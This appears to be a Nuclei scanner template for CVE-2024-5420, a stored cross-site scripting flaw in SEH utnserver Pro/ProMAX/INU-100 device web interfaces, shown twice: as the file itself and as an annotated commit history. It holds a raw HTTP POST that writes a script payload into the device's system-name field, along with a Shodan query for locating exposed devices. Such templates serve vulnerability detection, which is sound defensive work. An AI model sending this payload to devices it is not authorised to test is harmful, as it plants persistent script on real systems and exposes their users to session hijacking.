nuclei-templates/http/cves/2024/CVE-2024-5420.yaml

id: CVE-2024-5420

info:
  name: SEH utnserver Pro/ProMAX/INU-100 20.1.22 - Cross-Site Scripting
  author: bl4ckp4r4d1s3
  severity: high
  description: |
    A vulnerability was found in utnserver Pro, utnserver ProMAX, and INU-100 version 20.1.22 and earlier, affecting the device description parameter in the web interface. This flaw allows stored cross-site scripting (XSS), enabling attackers to inject JavaScript code. The attack can be executed remotely by tricking victims into visiting a malicious website, potentially leading to session hijacking. This vulnerability is publicly disclosed and identified as CVE-2024-5420.
  reference:
    - https://cyberdanube.com/en/en-multiple-vulnerabilities-in-seh-untserver-pro/index.html
    - https://seclists.org/fulldisclosure/2024/Jun/4
    - https://nvd.nist.gov/vuln/detail/CVE-2024-5420
    - http://seclists.org/fulldisclosure/2024/Jun/4
    - https://cyberdanube.com/en/en-multiple-vulnerabilities-in-oring-iap420/index.html
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:L
    cvss-score: 8.3
    cve-id: CVE-2024-5420
    cwe-id: CWE-79
    epss-score: 0.00043
    epss-percentile: 0.09509
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"utnserver Control Center"
  tags: cve,cve2024,utnserver,seh,xss,seclists

http:
  - raw:
      - |
        POST /device/description_en.html HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=set&sys_name=%E2%80%9C%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sys_descr=&sys_contact=

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'value="“><script>alert(document.domain)</script>" id="standort"'
          - 'Host name</label>'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022051388b85a170055ec23c30fbc457211223d879dadea52c135baf99776d83ef77022100ce6177ab9a960dc01d6c4f3d40de0e3e6256c7a1af09d484921f19c5a4285bb6:922c64590222798bb761d5b6d8e72950
Added CVE-2024-5420 Template 2024-08-14 22:02:40 +00:00			`id: CVE-2024-5420`

			`info:`
minorupdate 2024-08-17 05:33:37 +00:00			`name: SEH utnserver Pro/ProMAX/INU-100 20.1.22 - Cross-Site Scripting`
Added CVE-2024-5420 Template 2024-08-14 22:02:40 +00:00			`author: bl4ckp4r4d1s3`
			`severity: high`
			`description: \|`
			`A vulnerability was found in utnserver Pro, utnserver ProMAX, and INU-100 version 20.1.22 and earlier, affecting the device description parameter in the web interface. This flaw allows stored cross-site scripting (XSS), enabling attackers to inject JavaScript code. The attack can be executed remotely by tricking victims into visiting a malicious website, potentially leading to session hijacking. This vulnerability is publicly disclosed and identified as CVE-2024-5420.`
			`reference:`
			`- https://cyberdanube.com/en/en-multiple-vulnerabilities-in-seh-untserver-pro/index.html`
			`- https://seclists.org/fulldisclosure/2024/Jun/4`
updated matchers 2024-08-16 06:59:10 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2024-5420`
minorupdate 2024-08-17 05:33:37 +00:00			`- http://seclists.org/fulldisclosure/2024/Jun/4`
			`- https://cyberdanube.com/en/en-multiple-vulnerabilities-in-oring-iap420/index.html`
Added CVE-2024-5420 Template 2024-08-14 22:02:40 +00:00			`classification:`
			`cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:L`
			`cvss-score: 8.3`
			`cve-id: CVE-2024-5420`
			`cwe-id: CWE-79`
minorupdate 2024-08-17 05:33:37 +00:00			`epss-score: 0.00043`
			`epss-percentile: 0.09509`
Added CVE-2024-5420 Template 2024-08-14 22:02:40 +00:00			`metadata:`
			`verified: true`
			`max-request: 1`
minorupdate 2024-08-17 05:33:37 +00:00			`shodan-query: html:"utnserver Control Center"`
			`tags: cve,cve2024,utnserver,seh,xss,seclists`
Added CVE-2024-5420 Template 2024-08-14 22:02:40 +00:00
			`http:`
updated matchers 2024-08-16 06:59:10 +00:00			`- raw:`
			`- \|`
			`POST /device/description_en.html HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`action=set&sys_name=%E2%80%9C%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sys_descr=&sys_contact=`

			`matchers-condition: and`
Added CVE-2024-5420 Template 2024-08-14 22:02:40 +00:00			`matchers:`
			`- type: word`
			`part: body`
updated matchers 2024-08-16 06:59:10 +00:00			`words:`
			`- 'value="“><script>alert(document.domain)</script>" id="standort"'`
			`- 'Host name</label>'`
			`condition: and`

			`- type: word`
			`part: header`
			`words:`
			`- text/html`

Added CVE-2024-5420 Template 2024-08-14 22:02:40 +00:00			`- type: status`
			`status:`
			`- 200`
chore: sign templates 🤖 2024-08-17 05:40:47 +00:00			`# digest: 4a0a00473045022051388b85a170055ec23c30fbc457211223d879dadea52c135baf99776d83ef77022100ce6177ab9a960dc01d6c4f3d40de0e3e6256c7a1af09d484921f19c5a4285bb6:922c64590222798bb761d5b6d8e72950`